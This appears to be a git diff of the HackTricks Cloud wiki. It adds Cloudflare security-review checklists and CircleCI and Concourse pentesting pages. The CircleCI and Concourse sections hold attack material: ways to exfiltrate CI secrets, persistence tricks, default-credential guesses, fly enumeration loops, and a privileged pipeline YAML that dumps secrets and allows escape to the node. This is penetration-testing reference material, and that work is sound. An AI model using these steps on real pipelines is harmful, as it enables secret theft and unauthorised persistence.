@@ -108,17 +93,15 @@ If you have **access to the VCS** (like github) check the file `.circleci/config #### Secret Env Vars & Context enumeration -Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_. +Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_. #### Exfiltrate Project secrets -{% hint style="warning" %} -In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_). -{% endhint %} +> [!WARNING] +> In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_). -{% hint style="danger" %} -The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**. -{% endhint %} +> [!CAUTION] +> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**. 
All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**: @@ -224,9 +207,8 @@ workflows: context: Test-Context ``` -{% hint style="warning" %} -Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**. -{% endhint %} +> [!WARNING] +> Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**. #### Escape to Cloud 
@@ -259,28 +241,15 @@ jobs: #### Persistence -* It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access. - * _https://app.circleci.com/settings/user/tokens_ -* It's possible to **create projects tokens** to access the project with the permissions given to the token. - * _https://app.circleci.com/settings/project/github/\/\/api_ -* It's possible to **add SSH keys** to the projects. - * _https://app.circleci.com/settings/project/github/\/\/ssh_ -* It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday. - * Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday. -* If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor** -* You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value +- It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access. + - _https://app.circleci.com/settings/user/tokens_ +- It's possible to **create projects tokens** to access the project with the permissions given to the token. + - _https://app.circleci.com/settings/project/github/\/\/api_ +- It's possible to **add SSH keys** to the projects. + - _https://app.circleci.com/settings/project/github/\/\/ssh_ +- It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday. + - Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday. 
+- If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor** +- You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/cloudflare-security/README.md b/src/pentesting-ci-cd/cloudflare-security/README.md new file mode 100644 index 000000000..e4e65d7dd --- /dev/null +++ b/src/pentesting-ci-cd/cloudflare-security/README.md @@ -0,0 +1,134 @@ +# Cloudflare Security + +{{#include ../../banners/hacktricks-training.md}} + +In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** + +
+ +## Websites + +Review each with: + +{{#ref}} +cloudflare-domains.md +{{#endref}} + +### Domain Registration + +- [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain. + +Review each with: + +{{#ref}} +cloudflare-domains.md +{{#endref}} + +## Analytics + +_I couldn't find anything to check for a config security review._ + +## Pages + +On each Cloudflare's page: + +- [ ] Check for **sensitive information** in the **`Build log`**. +- [ ] Check for **sensitive information** in the **Github repository** assigned to the pages. +- [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/). +- [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any). +- [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code** +- [ ] In the details of each page `//pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**. +- [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page. + +## **Workers** + +On each Cloudflare's worker check: + +- [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker? +- [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information** +- [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input) + - Check for SSRFs returning the indicated page that you can control + - Check XSSs executing JS inside a svg image + - It is possible that the worker interacts with other internal services. 
For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input. + +> [!WARNING] +> Note that by default a **Worker is given a URL** such as `..workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it. + +## R2 + +On each R2 bucket check: + +- [ ] Configure **CORS Policy**. + +## Stream + +TODO + +## Images + +TODO + +## Security Center + +- [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise. +- [ ] Just **check this information** for security misconfigurations and interesting info + +## Turnstile + +TODO + +## **Zero Trust** + +{{#ref}} +cloudflare-zero-trust-network.md +{{#endref}} + +## Bulk Redirects + +> [!NOTE] +> Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior. + +- [ ] Check that the **expressions** and **requirements** for redirects **make sense**. +- [ ] Check also for **sensitive hidden endpoints** that you contain interesting info. 
+ +## Notifications + +- [ ] Check the **notifications.** These notifications are recommended for security: + - `Usage Based Billing` + - `HTTP DDoS Attack Alert` + - `Layer 3/4 DDoS Attack Alert` + - `Advanced HTTP DDoS Attack Alert` + - `Advanced Layer 3/4 DDoS Attack Alert` + - `Flow-based Monitoring: Volumetric Attack` + - `Route Leak Detection Alert` + - `Access mTLS Certificate Expiration Alert` + - `SSL for SaaS Custom Hostnames Alert` + - `Universal SSL Alert` + - `Script Monitor New Code Change Detection Alert` + - `Script Monitor New Domain Alert` + - `Script Monitor New Malicious Domain Alert` + - `Script Monitor New Malicious Script Alert` + - `Script Monitor New Malicious URL Alert` + - `Script Monitor New Scripts Alert` + - `Script Monitor New Script Exceeds Max URL Length Alert` + - `Advanced Security Events Alert` + - `Security Events Alert` +- [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS** + - [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous** + +## Manage Account + +- [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**. +- [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**. +- [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle. + - Therefore, whenever possible is **recommended** to use the **Enterprise plan**. 
+- [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled. + +> [!NOTE] +> Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members) + +## DDoS Investigation + +[Check this part](cloudflare-domains.md#cloudflare-ddos-protection). + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md new file mode 100644 index 000000000..8f3665647 --- /dev/null +++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md @@ -0,0 +1,133 @@ +# Cloudflare Domains + +{{#include ../../banners/hacktricks-training.md}} + +In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** + +
+ +### Overview + +- [ ] Get a feeling of **how much** are the services of the account **used** +- [ ] Find also the **zone ID** and the **account ID** + +### Analytics + +- [ ] In **`Security`** check if there is any **Rate limiting** + +### DNS + +- [ ] Check **interesting** (sensitive?) data in DNS **records** +- [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com) +- [ ] Check for web pages that **aren't** **proxied** +- [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address +- [ ] Check that **DNSSEC** is **enabled** +- [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs** + - This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings +- [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing) + +### **Email** + +TODO + +### Spectrum + +TODO + +### SSL/TLS + +#### **Overview** + +- [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point. +- [ ] The **SSL/TLS Recommender** should be enabled + +#### Edge Certificates + +- [ ] **Always Use HTTPS** should be **enabled** +- [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled** +- [ ] **Minimum TLS Version should be 1.2** +- [ ] **TLS 1.3 should be enabled** +- [ ] **Automatic HTTPS Rewrites** should be **enabled** +- [ ] **Certificate Transparency Monitoring** should be **enabled** + +### **Security** + +- [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses. + - The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used. 
+- [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used +- [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare +- [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections** +- [ ] In the **`Settings`** section: + - [ ] Check that the **`Security Level`** is **medium** or greater + - [ ] Check that the **`Challenge Passage`** is 1 hour at max + - [ ] Check that the **`Browser Integrity Check`** is **enabled** + - [ ] Check that the **`Privacy Pass Support`** is **enabled** + +#### **CloudFlare DDoS Protection** + +- If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access. +- In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie. + - If the attack is from a **verified bot**, at least **add a rate limit** to bots. + - If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path. + - You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF. + - Check if **Managed rules** could also help to prevent vulnerability exploitations. + - In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.** +- In DDoS you could **override some rules to make them more restrictive**. +- **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**. 
+- In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled +- In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events** + +### Access + +{{#ref}} +cloudflare-zero-trust-network.md +{{#endref}} + +### Speed + +_I couldn't find any option related to security_ + +### Caching + +- [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool** + +### **Workers Routes** + +_You should have already checked_ [_cloudflare workers_](./#workers) + +### Rules + +TODO + +### Network + +- [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled** +- [ ] **`HTTP/3 (with QUIC)`** should be **enabled** +- [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled** + +### **Traffic** + +TODO + +### Custom Pages + +- [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode) + +### Apps + +TODO + +### Scrape Shield + +- [ ] Check **Email Address Obfuscation** is **enabled** +- [ ] Check **Server-side Excludes** is **enabled** + +### **Zaraz** + +TODO + +### **Web3** + +TODO + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md new file mode 100644 index 000000000..8348eaf6b --- /dev/null +++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md @@ -0,0 +1,61 @@ +# Cloudflare Zero Trust Network + +{{#include ../../banners/hacktricks-training.md}} + +In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** + +
+ +### Analytics + +- [ ] Useful to **get to know the environment** + +### **Gateway** + +- [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications. + - If used, **policies** could be created to **restrict** the access to malicious sites. + - This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies. + +### Access + +#### Applications + +On each application: + +- [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access. + - To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also) +- [ ] Check the **available identity providers** and make sure they **aren't too open** +- [ ] In **`Settings`**: + - [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything) + - [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP. + - [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.** + +#### **Access Groups** + +- [ ] Check that the access groups generated are **correctly restricted** to the users they should allow. +- [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**. + - Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary. 
+ +#### Service Auth + +- [ ] Check that all service tokens **expires in 1 year or less** + +#### Tunnels + +TODO + +### My Team + +TODO + +### Logs + +- [ ] You could search for **unexpected actions** from users + +### Settings + +- [ ] Check the **plan type** +- [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address** +- [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/concourse-security/README.md b/src/pentesting-ci-cd/concourse-security/README.md new file mode 100644 index 000000000..d354374ef --- /dev/null +++ b/src/pentesting-ci-cd/concourse-security/README.md @@ -0,0 +1,33 @@ +# Concourse Security + +{{#include ../../banners/hacktricks-training.md}} + +## Basic Information + +Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...) + +## Concourse Architecture + +Learn how the concourse environment is structured in: + +{{#ref}} +concourse-architecture.md +{{#endref}} + +## Concourse Lab + +Learn how you can run a concourse environment locally to do your own tests in: + +{{#ref}} +concourse-lab-creation.md +{{#endref}} + +## Enumerate & Attack Concourse + +Learn how you can enumerate the concourse environment and abuse it in: + +{{#ref}} +concourse-enumeration-and-attacks.md +{{#endref}} + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md new file mode 100644 index 000000000..250af06ad --- /dev/null +++ b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md 
@@ -0,0 +1,38 @@ +# Concourse Architecture + +## Concourse Architecture + +{{#include ../../banners/hacktricks-training.md}} + +[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html) + +### Architecture + +![](<../../images/image (187).png>) + +#### ATC: web UI & build scheduler + +The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs). + +The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes. + +#### TSA: worker registration & forwarding + +The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc). + +The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer. + +The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa). + +#### Workers + +In order to execute tasks concourse must have some workers. 
These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim). + +- **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**. +- **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**. + +## References + +- [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html) + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md similarity index 66% rename from pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md rename to src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md index 4cdbcc7d0..538c0a92b 100644 --- a/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md @@ -2,34 +2,20 @@ ## Concourse Enumeration & Attacks -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ### User Roles & Permissions Concourse comes with five roles: -* _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC. -* **owner**: Team owners can **modify everything within the team**. -* **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings. -* **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations. -* **viewer**: Team viewers have **"read-only" access to a team** and its pipelines. +- _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC. +- **owner**: Team owners can **modify everything within the team**. +- **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings. +- **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations. +- **viewer**: Team viewers have **"read-only" access to a team** and its pipelines. -{% hint style="info" %} -Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). 
Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html) -{% endhint %} +> [!NOTE] +> Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html) Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them. 
@@ -45,36 +31,35 @@ Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by doub Static vars can be specified in **tasks steps**: ```yaml - - task: unit-1.13 - file: booklit/ci/unit.yml - vars: {tag: 1.13} +- task: unit-1.13 + file: booklit/ci/unit.yml + vars: { tag: 1.13 } ``` Or using the following `fly` **arguments**: -* `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`. -* `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`. -* `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars. -* `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all. +- `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`. +- `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`. +- `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars. +- `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all. 
#### Credential Management There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\ Moreover, Concourse supports different credential managers: -* [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html) -* [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html) -* [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html) -* [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html) -* [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html) -* [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html) -* [Caching credentials](https://concourse-ci.org/creds-caching.html) -* [Redacting credentials](https://concourse-ci.org/creds-redacting.html) -* [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html) +- [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html) +- [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html) +- [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html) +- [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html) +- [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html) +- [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html) +- [Caching credentials](https://concourse-ci.org/creds-caching.html) +- [Redacting credentials](https://concourse-ci.org/creds-redacting.html) +- [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html) -{% hint style="danger" %} -Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as 
Concourse needs to be able to access them. -{% endhint %} +> [!CAUTION] +> Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them. ### Concourse Enumeration 
@@ -82,41 +67,40 @@ In order to enumerate a concourse environment you first need to **gather valid c #### Login and Current User enum -* To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**: - * `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` -* Get configured **targets**: - * `fly targets` -* Get if the configured **target connection** is still **valid**: - * `fly -t status` -* Get **role** of the user against the indicated target: - * `fly -t userinfo` +- To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**: + - `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` +- Get configured **targets**: + - `fly targets` +- Get if the configured **target connection** is still **valid**: + - `fly -t status` +- Get **role** of the user against the indicated target: + - `fly -t userinfo` -{% hint style="info" %} -Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials. -{% endhint %} +> [!NOTE] +> Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials. 
#### Teams & Users -* Get a list of the Teams - * `fly -t teams` -* Get roles inside team - * `fly -t get-team -n ` -* Get a list of users - * `fly -t active-users` +- Get a list of the Teams + - `fly -t teams` +- Get roles inside team + - `fly -t get-team -n ` +- Get a list of users + - `fly -t active-users` #### Pipelines -* **List** pipelines: - * `fly -t pipelines -a` -* **Get** pipeline yaml (**sensitive information** might be found in the definition): - * `fly -t get-pipeline -p ` -* Get all pipeline **config declared vars** - * `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done` -* Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them): +- **List** pipelines: + - `fly -t pipelines -a` +- **Get** pipeline yaml (**sensitive information** might be found in the definition): + - `fly -t get-pipeline -p ` +- Get all pipeline **config declared vars** + - `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done` +- Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them): ```bash rm /tmp/secrets.txt; -for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do +for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt; echo ""; 
@@ -129,19 +113,19 @@ rm /tmp/secrets.txt #### Containers & Workers -* List **workers**: - * `fly -t workers` -* List **containers**: - * `fly -t containers` -* List **builds** (to see what is running): - * `fly -t builds` +- List **workers**: + - `fly -t workers` +- List **containers**: + - `fly -t containers` +- List **builds** (to see what is running): + - `fly -t builds` ### Concourse Attacks #### Credentials Brute-Force -* admin:admin -* test:test +- admin:admin +- test:test #### Secrets and params enumeration @@ -158,9 +142,9 @@ fly -t tutorial intercept # To be presented a prompt with all the options With these permissions you might be able to: -* **Steal the secrets** inside the **container** -* Try to **escape** to the node -* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible) +- **Steal the secrets** inside the **container** +- Try to **escape** to the node +- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible) #### Pipeline Creation/Modification 
@@ -168,34 +152,34 @@ If you have enough privileges (**member role or more**) you will be able to **cr ```yaml jobs: -- name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - echo "$SUPER_SECRET" - sleep 1000 - params: - SUPER_SECRET: ((super.secret)) + - name: simple + plan: + - task: simple-task + privileged: true + config: + # Tells Concourse which type of worker this task should run on + platform: linux + image_resource: + type: registry-image + source: + repository: busybox # images are pulled from docker hub by default + run: + path: sh + args: + - -cx + - | + echo "$SUPER_SECRET" + sleep 1000 + params: + SUPER_SECRET: ((super.secret)) ``` With the **modification/creation** of a new pipeline you will be able to: -* **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`) -* **Escape** to the **node** (by giving you enough privileges - `privileged: true`) -* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node) -* **Delete** created pipeline +- **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`) +- **Escape** to the **node** (by giving you enough privileges - `privileged: true`) +- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node) +- **Delete** created pipeline #### Execute Custom Task @@ -211,10 +195,10 @@ image_resource: run: path: sh args: - - -cx - - | - env - sleep 1000 + - -cx + - | + env + sleep 1000 params: SUPER_SECRET: ((super.secret)) ``` 
